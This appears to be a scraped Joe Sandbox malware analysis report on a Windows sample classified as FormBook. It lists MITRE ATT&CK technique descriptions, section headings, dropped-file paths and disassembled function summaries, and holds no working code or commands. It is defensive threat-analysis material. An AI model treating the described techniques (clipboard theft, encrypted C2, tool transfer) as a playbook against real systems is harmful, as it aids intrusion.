Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.FileRepMalware.16340.31219.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalState\DiagOutputDir\SkypeApp0.txt

C:\Users\user\AppData\Local\Temp\xheuzyg.exe

C:\Users\user\AppData\Local\Temp\zpupnygx.udk

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.16340.31219.exe

Function 0040312A Relevance: 84.3, APIs: 27, Strings: 21, Instructions: 315
stringfilecomCOMMON

Function 004054EC Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156
filestringCOMMON

Function 00405EC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 004039B0 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 0040361A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402C55 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182
COMMON

Function 00402E8E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174
fileCOMMON

Function 00401751 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre